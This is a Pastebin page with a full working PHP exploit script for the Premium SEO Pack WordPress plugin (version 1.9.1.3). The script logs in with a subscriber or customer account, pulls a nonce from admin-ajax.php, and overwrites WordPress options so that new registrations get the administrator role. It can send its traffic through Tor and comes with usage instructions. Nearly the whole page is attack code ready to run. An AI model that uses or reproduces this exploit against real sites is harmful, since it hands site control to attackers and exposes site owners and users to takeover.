Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * Exploit Title: Premium SEO Pack Exploit
- * Google Dork:
- * Exploit Author: wp0Day.com <contact@wp0day.com>
- * Vendor Homepage: http://aa-team.com/
- * Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2
- * Version: 1.9.1.3
- * Tested on: Debian 8, PHP 5.6.17-3
- * Type: Authenticated (customer, subscriber) wp_options overwrite
- * Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1]
- */
- require_once('curl.php');
- //OR
- //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
- $curl = new CurlWrapper();
- $options = getopt("t:m:u:p:a:",array('tor:'));
- echo "Current Options:\n";
- print_r($options);
- for($i=4;$i>0;$i--){
- echo "Starting in $i \r";
- sleep(1);
- }
- echo "Starting.... \r";
- echo "\n";
- $options = validateInput($options);
- if (!$options){
- showHelp();
- }
- if ($options['tor'] === true)
- {
- echo " ### USING TOR ###\n";
- echo "Setting TOR Proxy...\n";
- $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
- $curl->addOption(CURLOPT_PROXYTYPE,7);
- echo "Checking IPv4 Address\n";
- $curl->get('https://dynamicdns.park-your-domain.com/getip');
- echo "Got IP : ".$curl->getResponse()."\n";
- echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
- $answer = fgets(fopen ("php://stdin","r"));
- if(trim($answer) != 'wololo'){
- die("Aborting!\n");
- }
- echo "OK...\n";
- }
- function logIn(){
- global $curl, $options;
- file_put_contents('cookies.txt',"\n");
- $curl->setCookieFile('cookies.txt');
- $curl->get($options['t']);
- $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
- $curl->post($options['t'].'/wp-login.php', $data);
- $status = $curl->getTransferInfo('http_code');
- if ($status !== 302){
- echo "Login probably failed, aborting...\n";
- echo "Login response saved to login.html.\n";
- die();
- }
- file_put_contents('login.html',$curl->getResponse());
- }
- function exploit(){
- global $curl, $options;
- if ($options['m'] == 'admin_on') {
- echo "Setting default role on registration to Administrator\n";
- /* Getting a nonce */
- $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
- $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
- $resp = $curl->getResponse();
- $resp = json_decode($resp,true);
- preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
- if (!isset($mat[1])){
- die("Failed getting box_nonce\n");
- }
- $nonce = $mat[1][0];
- $new_settings = array('default_role'=>'administrator', 'users_can_register'=>1);
- $new_settings = urlencode(json_encode($new_settings));
- echo "Sending settings to update\n";
- $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
- $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
- $resp = $curl->getResponse();
- $resp = json_decode($resp,true);
- if (@$resp['status'] == 'ok'){
- echo "Admin mode is ON, go ahead an register yourself an Admin account! \n";
- } else {
- echo "Setting admin mode failed \n";
- }
- echo "Raw response: " . $curl->getResponse() . "\n";
- }
- if ($options['m'] == 'admin_off') {
- echo "Setting default role on registration to Subscriber\n";
- /* Getting a nonce */
- $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
- $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
- $resp = $curl->getResponse();
- $resp = json_decode($resp,true);
- preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
- if (!isset($mat[1])){
- die("Failed getting box_nonce\n");
- }
- $nonce = $mat[1][0];
- $new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0);
- $new_settings = urlencode(json_encode($new_settings));
- echo "Sending settings to update\n";
- $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
- $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
- $resp = $curl->getResponse();
- $resp = json_decode($resp,true);
- if (@$resp['status'] == 'ok'){
- echo "Admin mode is OFF \n";
- }
- echo "Raw response: " . $curl->getResponse() . "\n";
- }
- }
- logIn();
- exploit();
- function validateInput($options){
- if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
- return false;
- }
- if ( !isset($options['u']) ){
- return false;
- }
- if ( !isset($options['p']) ){
- return false;
- }
- if (!preg_match('~/$~',$options['t'])){
- $options['t'] = $options['t'].'/';
- }
- if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
- return false;
- }
- if ($options['m'] == 'tag' && !isset($options['a'])){
- }
- $options['tor'] = isset($options['tor']);
- return $options;
- }
- function showHelp(){
- global $argv;
- $help = <<<EOD
- Premium SEO Pack Exploit
- Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
- *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
- [MODE] admin_on - Sets default role on registration to Administrator
- admin_off - Sets default role on registration to Subscriber
- Examples:
- php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_on
- php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_off
- Misc:
- CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
- @link http://github.com/svyatov/CurlWrapper
- @license http://www.opensource.org/licenses/mit-license.html MIT License
- EOD;
- echo $help."\n\n";
- die();
- }
Add Comment
Please, Sign In to add comment